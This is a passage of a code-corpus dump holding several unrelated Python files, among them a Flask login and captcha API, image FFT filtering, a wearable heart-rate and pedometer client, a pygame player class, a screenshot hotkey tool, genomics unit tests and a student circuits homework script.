@Author : WieAngeal\n# @File : login_hander.py\n# @Software: PyCharm\n\nfrom flask import Blueprint, request, session, render_template\nfrom flask import url_for\nfrom ..services import UserService\nfrom ..common import (ConsoleLogger, relative_path)\nfrom ..common.captcha import CaptchaTool\nfrom flaskapp import app\nimport json, jsonify\nimport hashlib\nimport ast\nfrom ..common import auth, auth_trd\nimport re, time\nimport requests\n\nlogger = ConsoleLogger(relative_path(__file__))\nuser_service = UserService()\nlogin = Blueprint('login', __name__, url_prefix='/api/auth')\n\n@login.route('/generate_token', methods=[\"GET\", \"POST\"])\ndef create_token():\n method = request.method\n if method == 'POST':\n userdata = ast.literal_eval(request.form.get('data'))\n json_data = auth.login_verify(userdata['telphone'], userdata['password'], userdata['timecode'])\n logger.info(json_data)\n return json_data\n\n@login.route('/login_token', methods=['GET', 'POST'])\ndef token_verify():\n try:\n data = request.form.get('data')\n _token = json.loads(data)\n token = _token['_token'][0]\n rsp = auth.verify_auth_token(token)\n json_data = json.dumps(rsp)\n logger.info(json_data)\n return json_data\n except Exception as e:\n logger.error(e)\n\n@login.route('/register', methods=['GET', 'POST'])\ndef register_user():\n try:\n data = json.loads(request.form.get('data'))\n json_data = json.dumps(auth.register_user(data))\n return json_data\n except Exception as e:\n logger.error(e)\n\n\n@login.route('/imgcode', methods=['GET', 'POST'])\ndef get_verify_code():\n method = request.method\n if method == 'GET':\n try:\n new_captcha = CaptchaTool()\n img, code = new_captcha.get_verify_code()\n # 存入session\n session[\"code\"] = code\n return img\n except Exception as e:\n logger.error(e)\n\n@login.route('/verifycode', methods=[\"GET\", \"POST\"])\ndef verify_code():\n method = request.method\n if method == 'POST':\n try:\n userdata = ast.literal_eval(request.form.get('data'))\n if userdata['verifycode'] != session['code']:\n logger.error(\"验证码错误\" + userdata['verifycode'])\n return json.dumps(auth.rep_json_data(code=0, msg=\"验证码错误,请重新输入!\"))\n return json.dumps(auth.rep_json_data(code=1, msg=\"验证码正确!\"))\n except Exception as e:\n logger.error(e)\n\n@login.route('/wechat_code', methods=['GET', 'POST'])\ndef wechat_login():\n url = \"https://login.weixin.qq.com/qrcode/oel9rit2RA==\"\n json_data = json.dumps(url)\n logger.info(json_data)\n return json_data\n\n","sub_path":"flaskapp/views/login_handler.py","file_name":"login_handler.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"3271686","text":"import cv2 as cv\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nimg = cv.imread(\"riya.jpg\", 0)\nprint(img.shape)\n\n# 傅里叶变换\nf = np.fft.fft2(img)\n\n# 把中心点移动到中间\nfshift = np.fft.fftshift(f)\n\n# 获取幅值\nmagnitude_spectrum = 20 * np.log(np.abs(fshift))\n\n# 显示傅里叶变换后的二维图像\nplt.figure(figsize=(10, 10))\nplt.subplot(221), plt.imshow(img, cmap=\"gray\")\nplt.title('Input Image'), plt.xticks([]), plt.yticks([])\nplt.subplot(222), plt.imshow(magnitude_spectrum)\nplt.title('Magnitude Image'), plt.xticks([]), plt.yticks([])\n\n# 去掉低频信号\nrow, col = img.shape\ncX, cY = col // 2, row // 2\nfshift[(cY - 30):(cY + 30), (cX - 30):(cX + 30)] = 0\n\n# 傅里叶逆变换\nfshift_b = np.fft.ifftshift(fshift)\nf_b = np.fft.ifft2(fshift_b)\nimg_back = np.abs(f_b)\n\n# 显示逆变换后的图片\nplt.subplot(223), plt.imshow(img_back, cmap=\"gray\")\nplt.title('Output Image'), plt.xticks([]), plt.yticks([])\nplt.subplot(224), plt.imshow(img_back)\nplt.title('Result in JET'), plt.xticks([]), plt.yticks([])\n\nplt.show()\n","sub_path":"DeepLearningStudy/test/fft_numpy.py","file_name":"fft_numpy.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"255250428","text":"# coding:utf-8\nimport asyncio\nimport time\n\nimport requests\n\n\n@asyncio.coroutine\ndef main():\n loop = asyncio.get_event_loop()\n future1 = loop.run_in_executor(None, requests.get, 'http://httpbin.org/ip')\n future2 = loop.run_in_executor(None, requests.get, 'http://www.sina.com.cn')\n start = time.time()\n response1 = yield from future1\n print(time.time() - start)\n start = time.time()\n response2 = yield from future2\n print(time.time() - start)\n print(len(response1.text))\n print(len(response2.text))\n\n\nloop = asyncio.get_event_loop()\nloop.run_until_complete(main())\n","sub_path":"test/test_asyncio_requests.py","file_name":"test_asyncio_requests.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"566473122","text":"import json\nimport os.path\n\npath = \"./log.txt\"\n\n# Funcion para almacenar datos de respaldo\ndef saveBackup(data):\n # Abrir archivo de respaldo y agregar data en formato string al final\n f = open(path, \"a\")\n f.write(json.dumps(data) + \"\\n\")\n f.close()\n\n# Funcion para revisar si existen datos en el archivo\ndef loadBackup():\n # Verificar si existe el archivo, si no existe el archivo, retornar False\n if os.path.isfile(path):\n # abrir el archivo y almacenar en un array los datos en formato json\n data = []\n f = open(path)\n for line in f:\n # Eliminar los saltos de linea de cada dato y convertirlos a json\n data.append(json.loads(str(line).replace(\"\\n\",\"\")))\n f.close()\n # validar el largo de los datos antes de responder, si esta vacio, retornar false\n if len(data) > 0:\n return data\n else:\n return False\n else:\n return False\n\n# Funcion para limpiar archivo backup\ndef clean():\n f = open(path,\"w\")\n f.write(\"\")\n f.close()\n\n# Funcion para almacenar en archivo TXT la fecha y hora del dato recibido.\ndef recivedLog(datetime):\n f = open(path, \"a\")\n f.write(datetime + \" No hay Conexion. \\n\")\n f.close()\n return True\n\n# Funcion para almacenar en archivo TXT el error de la exception\ndef recivedExcept(datetime, error):\n f = open(\"./error.txt\", \"a\")\n f.write(\"=====================\\n\")\n f.write(datetime + \" \\n\")\n f.write(str(error[0]))\n f.write(\"\\n\")\n f.write(str(error[1]))\n f.close()\n return True","sub_path":"serverPivot/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"61490714","text":"from django.http import HttpResponseRedirect\nfrom django.shortcuts import render, render_to_response\nfrom django.views.generic.edit import FormView, UpdateView\n\nfrom missions.forms.customer import CustomerForm\nfrom missions.forms.mission import MissionForm\nfrom missions.forms.report import ReportForm\nfrom missions.models import Customer\n\nfrom django.contrib.auth.decorators import login_required\n\nclass CustomerView(FormView):\n template_name = 'customer.html'\n form_class = CustomerForm\n success_url = '/missions/customer'\n \n def form_valid(self, form):\n form.save()\n super(CustomerView, self).form_valid(form)\n \n return HttpResponseRedirect(self.success_url)\n \nclass MissionView(FormView):\n template_name = 'mission.html'\n form_class = MissionForm\n success_url = '/missions/mission'\n \n def form_valid(self, form):\n form.save()\n super(MissionView, self).form_valid(form)\n \n return HttpResponseRedirect(self.success_url)\n \nclass ReportView(FormView):\n template_name = 'report.html'\n form_class = ReportForm\n success_url = '/missions/report'\n \n def form_valid(self, form):\n form.save()\n super(ReportView, self).form_valid(form)\n \n return HttpResponseRedirect(self.success_url)\n \n@login_required\ndef customer_list(request, template='customer_list.html'):\n customers = Customer.objects.all()\n context = {\n 'customers': customers,\n }\n return render_to_response(template, context)\n\n\nclass CustomersUpdateView(UpdateView):\n template_name = 'customer.html'\n success_url = '/heroes/successcurrentteam'\n model = Customer\n form_class = CustomerForm\n \n \n \n","sub_path":"missions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"562255020","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 20 14:48:13 2020\n\n@author: joyceeito\n\"\"\"\n\n\nfrom Libraries.Connection import Connection\nfrom Libraries.Visualization import Visualization\nfrom Libraries.ppg import PPG\nfrom Libraries.Pedometer import Pedometer\nimport numpy as np\nimport matplotlib.pyplot as plt\n#from Libraries.ML import ML\nfrom scipy import signal\n\nclass Wearable:\n \n def __init__(self, serial_name, baud_rate):\n self.connection = Connection(serial_name, baud_rate)\n \n def collect_data(self,num_samples):\n \n self.connection.start_streaming()\n while self.connection.get_num_samples() < 500:\n try:\n self.connection.read_serial()\n except(KeyboardInterrupt):\n self.connection.end_streaming()\n self.connection.close_connection()\n print(\"Exiting program due to KeyboardInterrupt\")\n exit()\n self.connection.end_streaming()\n \n def run(self):\n self.connection.setup_connection()\n self.collect_data(500)\n self.connection.calc_sampling_rate()\n data_array = self.connection.data_array\n np.savetxt('hello.csv', data_array, delimiter=',')\n data_array_from_file = np.genfromtxt('hello.csv', delimiter=',')\n self.visualization = Visualization(data_array_from_file)\n self. visualization.plotData()\n self.my_plotter = Visualization(data_array_from_file)\n s = data_array_from_file[:,4]\n self.ppg = PPG(s)\n baseline = self.ppg.baseline()\n detrend = self.ppg.detrend(baseline,15)\n filtr = self.ppg.normalize_signal(detrend)\n plt.clf()\n plt.plot(filtr)\n plt.show()\n self.ppg.signal_diff()\n heartrate = self.ppg.calc_heart_rate(filtr)\n print(heartrate)\n heartrate = str(heartrate)\n heartrate = heartrate + '\\n'\n self.connection.send_serial(heartrate)\n #Lab5C3\n self.ped = Pedometer(500, data_array[:,0:4])\n step_count, inds = self.ped.process_data()\n print(step_count)\n self.my_plotter = Visualization(self.ped.data_array)\n self.my_plotter.plot_pedometer(self.ped.filtered_data,inds)\n #print(inds)\n step_count = str(step_count)\n step_count = step_count + '\\n'\n self.connection.send_serial(step_count)\n self.connection.close_connection()\n \n \n \n #def lab5(self):\n # directory = \"/Users/joyceeito/Downloads/SPring2020/ece16sp2020-ajito44/src/Python/Data_Lab5_ML/Training/\"\n # testing = \"/Users/joyceeito/Downloads/SPring2020/ece16sp2020-ajito44/src/Python/Data_Lab5_ML/Testing/\"\n # x = ML()\n # x.train_hr_model(directory)\n #y,z = x.test_hr_model(testing)\n #print(y)\n #print(z)\n \n \n def samples(self, num_samples):\n \n i = 0\n while i < num_samples:\n try:\n self.connection.read_serial()\n i = i+1\n except(KeyboardInterrupt):\n self.connection.end_streaming()\n self.connection.close_connection()\n print(\"Exiting program due to KeyboardInterrupt\")\n exit()\n \n def GrandChallenge(self):\n self.connection.start_streaming()\n count = 0\n while True:\n \n self.samples(100*32)\n data_array = self.connection.data_array\n s = data_array[:,4]\n self.ppg = PPG(s)\n self.ped = Pedometer(100, data_array[:,0:4])\n \n if count == 0:\n b,a,zi_in = self.ppg.onlyonce()\n c,d,zi_in2 = self.ped.onlyonce()\n count = count + 1\n else:\n zi_in = self.ppg.lfilter(b,a,zi_in)\n plt.cla()\n plt.subplot(211)\n plt.plot(self.connection.data_array[:,0],self.ppg.signal)\n heartrate = self.ppg.calc_heart_rate(self.ppg.signal)\n print(heartrate)\n heartrate = str(heartrate)\n heartrate = heartrate + '\\n'\n self.connection.send_serial(heartrate)\n zi_in2 = self.ped.lfilter(c,d,zi_in2)\n step_count, inds = self.ped.count_steps()\n plt.subplot(212)\n plt.plot(self.connection.data_array[:,0],self.ped.filtered_data)\n plt.show(block=False)\n plt.pause(0.001)\n print(step_count)\n step_count = str(step_count)\n step_count = step_count + '\\n'\n self.connection.send_serial(step_count)\n \ndef main():\n wearable = Wearable('/dev/cu.Angela_Bluetooth-ESP32S', 115200)\n #wearable.run()\n #wearable.lab5()\n wearable.GrandChallenge()\n \n \nif __name__ == \"__main__\":\n main()","sub_path":"src/Python/Wearable.py","file_name":"Wearable.py","file_ext":"py","file_size_in_byte":4927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"328062313","text":"\"\"\"\nМодуль, описывающий класс игрока\n\"\"\"\n# pylint: disable=C0321\n# pylint: disable=E1101\nimport math\nimport pygame\nimport settings\nimport point\nimport world\n\n#Класс для игрока\nclass Player(point.Point):\n \"Класс, описывающий игрока\"\n velocity = 10\n angle = 0\n score = 0\n lines = list()\n\n def __init__(self, x0, y0):\n \"Конструктор\"\n point.Point.__init__(self, x0, y0)\n self.x = x0\n self.y = y0\n self.score = 0\n for _ in range(7):\n self.lines.append((0, settings.BLACK))\n\n def update_lines(self):\n \"Обновляет линии\"\n for i in range(len(self.lines)):\n collide_wall = False\n collide_target = False\n collide_false_target = False\n collide = collide_wall or collide_target or collide_false_target\n while self.lines[i][0] < 100 and not collide:\n #увеличивает длину луча\n self.lines[i] = (self.lines[i][0] + 2, self.lines[i][1])\n\n #x и y координаты конца i-го луча\n angle = self.angle-math.pi/2+math.pi*(i+1)/8\n x_coordinate = self.x + self.lines[i][0]*math.cos(angle)\n y_coordinate = self.y + self.lines[i][0]*math.sin(angle)\n\n #определияет сталикивается ли конец луча хотя бы с одной из стен\n collide_wall = world.GAME_WORLD.is_collide_wall((int(x_coordinate),\n int(y_coordinate)))\n collide_target = world.GAME_WORLD.is_collide_target((int(x_coordinate),\n int(y_coordinate)))\n collide_false_target = world.GAME_WORLD.is_collide_false_target((int(x_coordinate),\n int(y_coordinate)))\n collide = collide_wall or collide_target or collide_false_target\n\n #если сталкивается\n if collide_wall:\n #меняет цвет луча\n self.lines[i] = (self.lines[i][0], settings.GREEN)\n if collide_target:\n self.lines[i] = (self.lines[i][0], settings.RED)\n if collide_false_target:\n self.lines[i] = (self.lines[i][0], settings.BLUE)\n\n def draw(self):\n \"\"\"Рисует игрока\"\"\"\n #Обновляет линии\n \"\"\"for i in range(len((self.lines)):\n angle = self.angle-math.pi/2+math.pi*(i+1)/8\n # Начало и конец луча\n A, B = point.Point(self.x, self.y), point.Point(100*cos(angle),100*sin(angle))\n min_wall = 100 #Расстояние до ближайшей стены\n for wall in GAME_WORLD.walls:\n if wall.cross(A, B):\n d = self.distance_to_line(wall.start, wall.end)\n if d < min_wall:\n min_wall = d\n min_target = 100 #Расстояние до ближайшей точки\n for interation_point in GAME_WORLD.target:\n d = iteration_point.distance_to(self)#Реализовать\n if d < min_target:\n min_target = d\n if min_wall < min_target:\n self.lines[i] = (self.lines[i][0], green)\n if min_wall > min_target:\n #Столкновение с целью\n if min_wall == min_target and min_wall == 100:\n self.lines[i] = (100, black)\"\"\"\n\n #Рисует линии\n i = 0\n for line in self.lines:\n i += 1\n pygame.draw.line(settings.GAME_DISPLAY,\n line[1],\n (self.x, self.y),\n (int(self.x + line[0]*math.cos(self.angle-math.pi/2+math.pi*i/8)),\n int(self.y + line[0]*math.sin(self.angle-math.pi/2+math.pi*i/8))),\n 2)\n self.clear_lines()\n #Рисует точку\n pygame.draw.circle(settings.GAME_DISPLAY, settings.BLACK, (self.x, self.y), 22)\n pygame.draw.circle(settings.GAME_DISPLAY, settings.WHITE, (self.x, self.y), 20)\n\n def clear_lines(self):\n \"Обнуляет линии\"\n self.lines = list()\n for _ in range(7):\n self.lines.append((0, settings.BLACK))\n\n def move(self, delpha_x, delpha_y):\n \"\"\"Передвигает игрока\"\"\"\n self.x += delpha_x\n self.y += delpha_y\n\n def controller_polar(self):\n \"\"\"Обрабатывает нажатие клавиатуры элементов управления\"\"\"\n delpha = 0\n key_states = pygame.key.get_pressed()\n if key_states[pygame.K_LEFT]:\n self.angle += -math.pi/10\n elif key_states[pygame.K_RIGHT]:\n self.angle += +math.pi/10\n if key_states[pygame.K_UP]:\n delpha = self.velocity\n elif key_states[pygame.K_DOWN]:\n delpha = -self.velocity\n else:\n delpha = 0\n self.move(int(delpha * math.cos(self.angle)), int(delpha * math.sin(self.angle)))\n self.update_lines()\n ","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":5492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"556394938","text":"#-*- coding='utf-8' -*-\nfrom datetime import datetime\nimport mouse as MS\nimport keyboard as KB\nimport pyautogui as PA\n#from PyQt5.QtWidgets import QWidget ,QPushButton\n\ndef file_test():\n try:\n file = open('settings.conf','rt',encoding='utf-8')\n except FileNotFoundError:\n file = open('settings.conf','wt',encoding='utf-8')\n file.write(' ')\n file.close()\n return False\n line = file.readline()\n if line == ' ':\n return False\n else:\n return True\n\n\ndef setting():\n conf = open('settings.conf','wt',encoding='utf-8')\n print(\"Left Click on Left Upper Side\")\n request = False\n while(1):\n if MS.is_pressed():\n left_upper = MS.get_position();\n break\n print(\"Right Click on Right Lower Side\")\n while(1):\n if MS.is_pressed(MS.RIGHT):\n right_lower = MS.get_position();\n break\n hotkey = 'Hotkey = ctrl+alt'\n\n conf.write('Left_Upper = ' + str(left_upper[0]) + ',' + str(left_upper[1])+'\\n')\n conf.write('Size = '+ str(right_lower[0]-left_upper[0]) + ',' + str(right_lower[1]-left_upper[1])+'\\n')\n conf.write(hotkey)\n conf.close()\n print('Setting Complete')\n '''\n print(\"If You want to set hotkey Press S, or Not Press Q\")\n while(1):\n if KB.is_pressed('s'):\n request = True\n break\n if KB.is_pressed('q'):\n request = False\n break\n if request:\n '''\n\ndef loading():\n loc = []\n hotkey = ''\n conf = open('settings.conf','rt',encoding='utf-8')\n for line in conf:\n if line[0] == 'L' or line[0] == 'S':\n x = int(line[line.find('= ') + 2:line.find(',')])\n y = int(line[line.find(',') + 1:line.find('\\n')])\n loc.append(x)\n loc.append(y)\n else:\n hotkey = line[line.find('= ') + 2:]\n conf.close()\n return tuple(loc), hotkey\n\ndef capture(loc):\n now = str(datetime.now().year) + '_' + str(datetime.now().month) + '_' + str(datetime.now().day) + '_' + str(datetime.now().hour)+'_' + str(datetime.now().minute) + '_' + str(datetime.now().second)\n path = './screenshot/' + now + '.png'\n PA.screenshot(path,region=loc)\n\ndef show_info():\n print('If You Want Capture, press CTRL+ALT')\n print('If You Want Exit, press CTRL+Q')\n print('If You Want to change Setting, press CTRL+SHIFT')\n\ndef main():\n if file_test() is False:\n setting()\n location , hotkey = loading()\n show_info()\n while(1):\n if KB.is_pressed(hotkey):\n capture(location)\n if KB.is_pressed('ctrl+shift'):\n setting()\n location , hotkey = loading()\n show_info()\n if KB.is_pressed('ctrl+q'):\n break\n\nif __name__ == \"__main__\":\n\tmain()\n\n\n\n\n","sub_path":"Personal Study/2021/Screen_Capture_Project/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"456462114","text":"import lostructpy as ls\nimport cyvcf2 as vcf\nimport sparse\nimport numpy as np\nfrom itertools import islice\nfrom skbio.stats.ordination import pcoa\n\n# TODO: Rewrite this to make early VCF parsing and PCA stuff one-time run\n\n# This codeblock taken from https://docs.python.org/3/library/itertools.html\ndef take(n, iterable):\n \"Return first n items of the iterable as a list\"\n return list(islice(iterable, n))\n#...\n\nvcf_file = \"chr1-filtered.vcf.gz\"\n\ndef test_readvcf():\n assert(ls.get_landmarks(vcf_file)[0] == \"chl_Mt\")\n assert(ls.get_samples(vcf_file)[0] == \"HM017-I\")\n assert(len(ls.get_samples(vcf_file)) == 50)\n\ndef test_partitionall():\n assert(len(list(ls.partition_all(3, range(10)))[3]) == 1)\n\ndef test_getsnps():\n record = next(ls.get_snps(vcf_file, \"chr1\"))\n assert(isinstance(record, vcf.Variant))\n\ndef test_getgts():\n record = next(ls.get_snps(vcf_file, \"chr1\"))\n gts = ls.get_gts(record)\n assert(gts.shape == (50,))\n assert(gts[0] == 2.)\n assert(gts[-1] == 2.)\n\ndef test_parse_vcf():\n windows, positions = ls.parse_vcf(vcf_file, \"chr1\", 99)\n assert(len(windows) == 119)\n assert(len(positions) == len(windows))\n assert(positions[0][0] == 59864)\n assert(isinstance(windows[0], sparse.COO))\n\nerror_tolerance = 0.00000001\n\ndef test_cov_pca():\n windows, _ = ls.parse_vcf(vcf_file, \"chr1\", 99)\n covmat, total_variance, eigenvals, eigenvecs = ls.cov_pca(windows[0].todense(), 5, 1)\n assert(np.abs(np.sum(covmat) - -0.4784263654778492) <= error_tolerance)\n assert(np.abs(np.sum(total_variance) - 0.9265612493057297) <= error_tolerance)\n assert(np.abs(np.sum(eigenvals) - 1.735862014813605) <= error_tolerance)\n assert(np.abs(np.sum(eigenvecs) - 0.13157175919284625) <= error_tolerance)\n\ndef test_eigen_windows():\n windows, _ = ls.parse_vcf(vcf_file, \"chr1\", 99)\n covmat, total_variance, eigenvals, eigenvecs = ls.eigen_windows(windows[0], 5, 1)\n assert(np.abs(np.sum(covmat) - -0.4784263654778492) <= error_tolerance)\n assert(np.abs(np.sum(total_variance) - 0.9265612493057297) <= error_tolerance)\n assert(np.abs(np.sum(eigenvals) - 1.735862014813605) <= error_tolerance)\n assert(np.abs(np.sum(eigenvecs) - 0.13157175919284625) <= error_tolerance)\n\ndef test_l1_norm():\n windows, _ = ls.parse_vcf(vcf_file, \"chr1\", 99)\n _, _, eigenvals, _ = ls.eigen_windows(windows[0], 5, 1)\n assert(np.sum(ls.l1_norm(eigenvals)) == 5.0)\n\n# Many of these tests are redundant, so this one won't be...\n# It also tests dist_sq_from_pcs so we won't test that separately...\ndef test_get_pcs_dists():\n windows, _ = ls.parse_vcf(vcf_file, \"chr1\", 99)\n result = list()\n for x in take(4, windows):\n result.append(ls.eigen_windows(x, 10, 1))\n result = np.vstack(result)\n pc_dists = ls.get_pc_dists(result)\n\n assert(pc_dists[0][0] == 0.0)\n assert(np.abs(pc_dists[0][3] - 0.30474948474286145) <= error_tolerance)\n\ndef test_compare_to_rcode():\n windows, _ = ls.parse_vcf(vcf_file, \"chr1\", 95)\n covmat, total_variance, eigenvals, eigenvecs = ls.cov_pca(windows[0].todense(), 10, 1)\n\n results = np.loadtxt(\"lostruct-results/chr1.filtered.pca.csv\", \n delimiter=\",\", \n skiprows=1)\n\n totalandvalsR = results[0][0:11]\n totalandvalsPy = np.concatenate(([total_variance], eigenvals)),\n # Comes out as 0.9999921929150888\n assert(np.corrcoef(totalandvalsR, totalandvalsPy)[0][1] >= 0.99999)\n\n # Squared here, because signs are often opposite between the two analyses.\n eigenvecsR = np.square(results[0][11:61])\n eigenvecsPy = np.square(eigenvecs[0])\n # Comes out as 0.9999921929150888\n assert(np.corrcoef(eigenvecsR, eigenvecsPy)[0][1] >= 0.99999)\n assert(covmat.shape == (50, 50))\n\n mds_coords = np.loadtxt(\"lostruct-results/mds_coords.csv\", \n delimiter=\",\", skiprows=1, usecols=[2])\n\n result = list()\n for x in windows:\n result.append(ls.eigen_windows(x, 10, 1))\n result = np.vstack(result)\n pc_dists = ls.get_pc_dists(result)\n mds = pcoa(pc_dists)\n # Comes out as 0.9971509982243156\n assert(np.corrcoef(mds.samples['PC1'], mds_coords)[0][1] >= 0.995)\n","sub_path":"tests/test_fns.py","file_name":"test_fns.py","file_ext":"py","file_size_in_byte":4179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"622114950","text":"#!/usr/local/bin/python3.7\n\n# ######################################################\n# Author : < Yanjun Chen >\n# email : < chen2620 >\n# ID : < ee364f21 >\n# Date : < 9/3/2019 >\n# ######################################################\n\nimport os # List of module import statements\nimport sys # Each one on a line\nimport glob\nfrom collections import namedtuple\nfrom pprint import pprint as pp\n\n#helper function\n##read projects.dat\n##return two maps: a[projectid] = circuitid\n## b[circuitid] = projectid\ndef readprojectid():\n with open('maps/projects.dat', 'r') as f:\n projects = f.readlines()[2:]\n\n targetcircuitid = {}\n targetprojectid = {}\n for project in projects:\n project = project.split()\n targetcircuitid[project[1]] = []\n targetprojectid[project[0]] = []\n\n for project in projects:\n project = project.split()\n targetcircuitid[project[1]].append(project[0]) #[projectid] = circuitid\n targetprojectid[project[0]].append(project[1]) #[circuitid] = projectid\n\n return (targetcircuitid,targetprojectid)\n\n##read student.dat\n##return a list with student name and ID\ndef readstudentid():\n with open('maps/students.dat', 'r') as f:\n students = f.readlines()[2:]\n studentlist = []\n Student = namedtuple(\"Student\",[\"name\",\"ID\"])\n for student in students:\n student = student.split()\n studentlist.append(Student(str(student[0]+' '+student[1]),student[3]))\n return studentlist\n\n##given a circuit ID, form it to a filename format\ndef helpreadcircuitfiles(circuitid):\n file = 'circuits/circuit_'+circuitid+'.dat'\n return readcircuitfiles(file)\n\n##given a filename of circuit, open the file\n##return student ID and component ID\ndef readcircuitfiles(file):\n with open(file, 'r') as f:\n components = f.readlines()\n index = components.index('Components:\\n')+2 #studentid + componentid\n\n name = []\n for names in components[2:index-3]:\n names = names.split()\n name.append(names[0])\n list = []\n for component in components[index:]:\n component = component.split()\n list.append(component[0])\n return (name,list)\n\n##given a symbol (\"R\"\"I\"\"C\"\"T\")\n##return all the component id and price\ndef readcomponent(componentSymbol):\n if (componentSymbol == \"R\"):\n file = 'resistors' # are identical\n elif (componentSymbol == \"I\"):\n file = 'inductors' # are identical\n elif (componentSymbol == \"C\"):\n file = 'capacitors' # are identical\n elif (componentSymbol == \"T\"):\n file = 'transistors' # are identical\n else:\n ValueError(\"symbol passed is incorrect\")\n\n with open('maps/'+file+'.dat', 'r') as f:\n components = f.readlines()[3:]\n\n componentid = {}\n for component in components:\n component = component.split()\n price = component[1].split('$')\n componentid[component[0]] = float(price[1])\n return componentid\n\n##given either student name or student id\n##return the student id or student full name\ndef readstudent(studentName,studentid):\n allstudent = readstudentid()\n if (studentid == None):\n for student in allstudent:\n if student.name == studentName:\n targetstudentid = student.ID\n return targetstudentid\n else:\n raise ValueError(\"student name passed does not exist\")\n elif (studentName == None):\n targetstudent = []\n for student in allstudent:\n if student.ID in studentid:\n targetstudent.append(student.name)\n if (targetstudent == []):\n raise ValueError(\"student ID passed does not exist\")\n return targetstudent\n\n# ######################################################\n#Task 10\ndef getCircuitByComponent(componentIDs):\n circuitid = set()\n for filename in glob.glob(os.path.join('circuits/*.dat')):\n _, components = readcircuitfiles(filename)\n for component in components:\n if component in componentIDs:\n file = filename.split('circuits/circuit_')\n file = (file[1]).split('.dat')[0] ##circuit ID\n circuitid.add(file)\n\n return circuitid\n\n#Task 9\ndef getCircuitByStudent(studentNames):\n circuitid = set()\n studentID = []\n for student in studentNames:\n studentID.append(readstudent(student,None))\n for filename in glob.glob(os.path.join('circuits/*.dat')):\n students, _ = readcircuitfiles(filename)\n for student in students:\n if student in studentID:\n file = filename.split('circuits/circuit_')\n file = (file[1]).split('.dat')[0] ##circuit ID\n circuitid.add(file)\n return circuitid\n\n#Task8\ndef getComponentReport(componentIDs):\n map = {}\n ##mapproject = {}\n for componentID in componentIDs:\n map[componentID] = 0\n ##mapproject[componentID] = set()\n\n _,targetprojectid = readprojectid()\n for filename in glob.glob(os.path.join('circuits/*.dat')):\n _, components = readcircuitfiles(filename)\n for component in components:\n if component in componentIDs:\n file = filename.split('circuits/circuit_')\n file = (file[1]).split('.dat')[0] ##circuit ID\n #for project in targetprojectid[file]: #find identical project\n #if project not in mapproject[component]:\n #mapproject[component].add(project)\n ##map[component] += 1\n #pp(targetprojectid[file])\n map[component] += len(targetprojectid[file])\n return map\n\n#Task7\ndef getCommonByProject(projectID1, projectID2):\n targetcircuitid, _ = readprojectid()\n try:\n circuitIDs1 = targetcircuitid[projectID1]\n except:\n raise ValueError(\"the project ID1 provided does not exists\")\n try:\n circuitIDs2 = targetcircuitid[projectID2]\n except:\n raise ValueError(\"the project ID2 provided does not exists\")\n\n componentlist1 = set()\n componentlist2 = set()\n for circuitID1 in circuitIDs1:\n _, component1 = helpreadcircuitfiles(circuitID1)\n componentlist1.update(component1)\n for circuitID2 in circuitIDs2:\n _, component2 = helpreadcircuitfiles(circuitID2)\n componentlist2.update(component2)\n\n return sorted(list(componentlist1 & componentlist2))\n\n#Task6\ndef getProjectByComponent(componentIDs):\n list = []\n for filename in glob.glob(os.path.join('circuits/*.dat')):\n _, components = readcircuitfiles(filename)\n for component in components:\n if component in componentIDs:\n file = filename.split('circuits/circuit_')\n file = (file[1]).split('.dat')[0] ##circuit ID\n list.append(file)\n\n # read project.dat to find project id\n _, targetprojectid = readprojectid()\n projectid = set()\n for circuitid in list:\n projectid.update(targetprojectid[circuitid])\n return projectid\n\n#Task5\ndef getCostOfProjects():\n # read project.dat\n targetcircuitid, _ = readprojectid()\n # read symbol.dat\n componentMapR = readcomponent(\"R\")\n componentMapI = readcomponent(\"I\")\n componentMapC = readcomponent(\"C\")\n componentMapT = readcomponent(\"T\")\n\n map = {}\n totalprice = 0\n for projectID in targetcircuitid.keys():\n circuitid = targetcircuitid[projectID]\n for circuit in circuitid:\n _,components = helpreadcircuitfiles(circuit)\n for component in components:\n if str(component) in componentMapR.keys():\n totalprice += componentMapR[component]\n elif str(component) in componentMapI.keys():\n totalprice += componentMapI[component]\n elif str(component) in componentMapC.keys():\n totalprice += componentMapC[component]\n elif str(component) in componentMapT.keys():\n totalprice += componentMapT[component]\n map[projectID] = round(totalprice,2)\n totalprice = 0\n return map\n\n#Task4\ndef getParticipationByProject(projectID):\n # read project.dat\n targetcircuitid, _ = readprojectid()\n try:\n circuitids = targetcircuitid[projectID]\n except:\n raise ValueError(\"the project ID provided does not exists\")\n\n studentids = []\n # read circuit.dat find which student participated\n for circuitid in circuitids:\n studentid,_ = helpreadcircuitfiles(circuitid)\n studentids += studentid ##stored all studentsID participated in the project\n\n studentID = readstudent(None,studentids)\n return set(studentID)\n\n#Task3\ndef getParticipationByStudent(studentName):\n # read student.dat get target student id\n studentid = readstudent(studentName,None)\n\n # read project.dat to find project id\n _, targetprojectid = readprojectid()\n projectid = set()\n # read all circuit.dat to find which circuit student participate\n for filename in glob.glob(os.path.join('circuits/*.dat')):\n ids, component = readcircuitfiles(filename)\n if studentid in ids:\n file = filename.split('circuits/circuit_')\n file = (file[1]).split('.dat')[0] #get circuit id only\n try:\n projectid.update(targetprojectid[file])\n 